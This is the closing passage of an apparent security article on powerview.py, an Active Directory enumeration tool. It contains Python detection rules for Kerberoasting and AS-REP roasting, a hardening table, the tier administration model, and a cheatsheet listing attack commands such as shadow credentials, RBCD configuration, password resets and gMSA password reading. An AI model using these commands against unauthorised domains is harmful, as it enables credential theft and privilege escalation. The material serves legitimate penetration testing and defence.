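         "client": e["Client_Address"], "encryption": e["Ticket_Encryption_Type"]}
        for e in events
        if e["EventCode"] == 4768 and e["Pre_Authentication_Type"] == "0"
    ]


def run_detections(events):
    """Run both rules and return the combined alert list."""
    return detect_kerberoasting(events) + detect_asrep_roasting(events)


if __name__ == "__main__":
    for alert in run_detections(SAMPLE_EVENTS):
        print(alert)
```

A real deployment would key the count on a time window as well, since a developer's build box can legitimately collect that many RC4 tickets over a day; the per-(account, client) grouping mirrors the stats clause of the Splunk query.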
Hardening Recommendations
| Vulnerability | Remediation | Priority |
|---|---|---|
| Kerberoastable service accounts | Use gMSA accounts; enforce 25+ char passwords; use AES encryption (RC4 disabled) | Critical |
| AS-REP Roastable accounts | Enable Kerberos pre-authentication on all accounts; audit quarterly | Critical |
| Unconstrained delegation | Migrate to constrained or resource-based delegation; mark sensitive accounts as "Account is sensitive" | Critical |
| High Machine Account Quota | Set ms-DS-MachineAccountQuota to 0; use dedicated accounts for domain joins | High |
| Overpermissive ACLs | Regular ACL audits with BloodHound/PingCastle; remove GenericAll/WriteDACL from non-admin accounts | High |
| Passwords in description fields | Audit all user description fields; implement process controls for account provisioning | High |
| Excessive share permissions | Implement least-privilege on all shares; audit with automated tools quarterly | Medium |
| Legacy OS computers | Decommission or isolate legacy systems; apply compensating controls (firewall, EDR) | Medium |
Implementing a Tiered Administration Model
Microsoft's Active Directory Tier Model (also known as the Enterprise Access Model) is one of the most effective architectural controls for limiting the blast radius of a domain compromise. The model separates administrative accounts into three tiers:
Tier 0 — Domain Controllers & Identity Infrastructure
Domain Controllers, ADCS servers, AD Connect, privileged identity management systems. Tier 0 admins ONLY log into Tier 0 systems. Compromise of Tier 0 = full domain compromise.
Tier 1 — Server Infrastructure
Member servers, applications, databases. Tier 1 admins manage servers but cannot access Tier 0 systems. Compromise is contained to the server tier.
Tier 2 — Workstations & End-User Devices
Desktops, laptops, mobile devices. Tier 2 admins (helpdesk) can only access workstations. Compromise is limited to the workstation tier.
PowerView.py Command Cheatsheet
| Category | Command | Description |
|---|---|---|
| Domain | Get-Domain | Get domain information |
| | Get-DomainController | List domain controllers |
| | Get-DomainTrust | Enumerate trust relationships |
| | Get-DomainDNSRecord | Enumerate DNS records |
| Users | Get-DomainUser | List all users |
| | Get-DomainUser -SPN | Find Kerberoastable users |
| | Get-DomainUser -AdminCount | Find privileged users |
| | Get-DomainUser -PreAuthNotRequired | Find AS-REP Roastable users |
| | Set-DomainUserPassword | Reset a user's password |
| Computers | Get-DomainComputer | List all computers |
| | Get-DomainComputer -Unconstrained | Find unconstrained delegation |
| | Get-DomainComputer -TrustedToAuth | Find constrained delegation |
| | Get-NetComputerInfo | Get detailed computer info |
| Groups | Get-DomainGroup | List all groups |
| | Get-DomainGroupMember | Get group members |
| | Get-DomainForeignGroupMember | Cross-domain group members |
| ACLs | Get-DomainObjectAcl | Get object ACLs |
| | Get-DomainObjectOwner | Get object owner |
| | Add-DomainObjectAcl | Add ACE to object |
| Sessions | Get-RegLoggedOn | Registry-based logged-on users |
| | Get-NetSession | Active network sessions |
| | Get-NetLoggedOn | Logged-on users (WMI) |
| Shares | Get-NetShare | Enumerate network shares |
| | Get-NamedPipes | Enumerate named pipes |
| Attacks | Set-ShadowCredential | Add shadow credentials |
| | Set-DomainRBCD | Configure RBCD |
| | Get-DomainGMSA | Read gMSA passwords |
Conclusion
powerview.py represents the evolution of Active Directory enumeration tooling — bringing the power of the legendary PowerView.ps1 to the Linux platform while adding new capabilities, flexible authentication methods, and built-in evasion techniques. Whether you are a red teamer mapping a target domain, a penetration tester looking for privilege escalation paths, or a blue teamer trying to understand your attack surface, this tool provides an unparalleled view into the inner workings of Active Directory.
The key takeaway is that Active Directory is inherently transparent. Every domain user can see almost everything. The information is there, waiting to be read. The question is whether your security team reads it before the attackers do. By regularly running tools like powerview.py and BloodHound against your own environment, you can identify and remediate misconfigurations before they become breach headlines.
Figure 8: Active Directory penetration testing methodology — a structured approach to identifying and exploiting domain vulnerabilities.
Reconnaissance may not feel exciting at first, but it is the true foundation of effective security work. When you learn to listen to what the domain is already telling you, the path forward becomes much clearer.
References & Further Reading
- Hackers-Arise: Linux: PowerView for Linux — How Hackers Enumerate Domains. hackers-arise.com
- aniqfakhrul: powerview.py — Active Directory Enumeration Tool. github.com/aniqfakhrul/powerview.py
- PowerView.py Official Wiki — Installation, Usage, and Cheatsheets. github.com/aniqfakhrul/powerview.py/wiki
- HackTricks: Pentesting LDAP (389, 636, 3268, 3269). book.hacktricks.xyz
- ired.team: Active Directory Enumeration with PowerView. ired.team
- Hack The Box: Active Directory Penetration Testing Cheatsheet and Guide. hackthebox.com
- Netwrix: Kerberoasting Attack — Detection and Prevention Strategies. netwrix.com
- Praetorian: How to Exploit Active Directory ACL Attack Paths Through LDAP Relaying. praetorian.com
- Australian Cyber Security Centre: Detecting and Mitigating Active Directory Compromises. cyber.gov.au
- Microsoft: Implementing Least-Privilege Administrative Models. learn.microsoft.com